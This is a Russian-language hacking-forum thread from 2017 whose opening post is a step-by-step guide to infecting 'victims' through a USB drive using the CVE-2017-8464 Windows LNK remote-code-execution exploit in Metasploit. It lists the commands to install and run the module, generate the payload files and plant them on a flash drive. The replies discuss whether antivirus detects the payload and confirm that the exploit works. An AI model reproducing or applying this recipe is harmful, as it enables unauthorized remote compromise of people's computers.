HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.09.2017, 12:48
Ondrik8
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами: 5005666

Репутация: 0
По умолчанию

Всем привет, смотрю пошла у нас движуха с USB девайсами для заражения жертв, ну думаю "че я лысый?) в трэнде нужно быть!" Правильно?_) Вот и представлю Вашему вниманию очередной способ заражения от меня)
Нам потребуется 5 минут USB - накопитель, Kali-linux и так едем... сюда !





уязвимые ОС-и





переименовываем и телепортируем в метасплойт:

Код:


Код:
mv 42382 CVE_2017_8464_LNK_Rce.rb
Код:


Код:
mv CVE_2017_8464_LNK_Rce.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
запускаем MSF и обновляемся командой: reload_all и...



exploit -j

далее, настраиваем под себя уязвимость:

Код:


Код:
use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce




можете еще и порт настроить под себя, жмем: exploit

MSF сгенерит файлы, откроем скрытую папку где они лежат) командой: xdg-open /root/.msf4/local/

перенесем их в нашу злую USB-flash-ку )) и подсунем флэшку "жертве прогресса"!)) Как только "жертва" откроет у себя на компе для просмотра содержимого, у Вас появится заветная сессия!))

Удачи!
 
Ответить с цитированием

  #2  
Старый 15.09.2017, 22:42
Ondrik8
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами: 5005666

Репутация: 0
По умолчанию

Цитата:

MrsRobot сказал(а):

спасибо! а как реагируют антивирусники, не тестил? есет будет ругаться?

не нетестил с антиками) если есть возможность? отпиши плиз..
 
Ответить с цитированием

  #3  
Старый 15.09.2017, 23:10
Ondrik8
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами: 5005666

Репутация: 0
По умолчанию

Цитата:

MrsRobot сказал(а):

где б достать такую редкость как флешка.. ?) неужели ими кто-то пользуется..?_)
а файл же остался у тебя? может на вирустотал закинешь, проверишь? была бы благодарна..)

У Вас нету разве простой USB флэшки?)) там много файлов и НЕ НУЖНО на вирус-тотал закидывать что либо !!!!!!!!!!!!! про это уже знают все)
 
Ответить с цитированием

  #4  
Старый 15.09.2017, 23:34
Ondrik8
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами: 5005666

Репутация: 0
По умолчанию

Цитата:

MrsRobot сказал(а):

есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]
ок..сама потестирую будет время
у нас все в облаках

www.antivirusware.com/
http://www.threatexpert.com
https://www.zonealarm.com
http://www.virscan.org
https://www.symantec.com
https://www.comodo.com
 
Ответить с цитированием

  #5  
Старый 16.09.2017, 00:01
persivald
Новичок
Регистрация: 26.08.2017
Сообщений: 0
С нами: 4586369

Репутация: 0
По умолчанию

Цитата:

MrsRobot сказал(а):

есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]
ок..сама потестирую будет время
у нас все в облаках

есет смарт секьюрити (лицензия) обнаруживает трояна
 
Ответить с цитированием

  #6  
Старый 16.09.2017, 20:04
Ondrik8
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами: 5005666

Репутация: 0
По умолчанию

Девушка.... что хотеть?)

Чето фильм вспомнился "девушка с тату дракона")
 
Ответить с цитированием

  #7  
Старый 16.09.2017, 22:02
ghost
Новичок
Регистрация: 27.04.2010
Сообщений: 0
С нами: 8442422

Репутация: 0
По умолчанию

Цитата:

Ondrik8 сказал(а):

Девушка.... что хотеть?)

Чето фильм вспомнился "девушка с тату дракона")

Хороший фильм

Код:


Код:
msf > -j
[-] Unknown command: -j.
msf >
msf > use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
[-] Failed to load module: exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
msf >
 
Ответить с цитированием

  #8  
Старый 17.09.2017, 14:22
ghost
Новичок
Регистрация: 27.04.2010
Сообщений: 0
С нами: 8442422

Репутация: 0
По умолчанию

Заработало!
 
Ответить с цитированием

  #9  
Старый 17.09.2017, 16:34
adm2
Новичок
Регистрация: 28.08.2008
Сообщений: 3
С нами: 9316533

Репутация: 1
По умолчанию

Как держать это всё в голове и понять какую из 1983746 уязвимостей применить в данный конкретный момент?
 
Ответить с цитированием

  #10  
Старый 17.09.2017, 19:43
persivald
Новичок
Регистрация: 26.08.2017
Сообщений: 0
С нами: 4586369

Репутация: 0
По умолчанию

Цитата:

adm2 сказал(а):

Как держать это всё в голове и понять какую из 1983746 уязвимостей применить в данный конкретный момент?

а не надо ничего в голове держать) для этого есть сканеры)
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.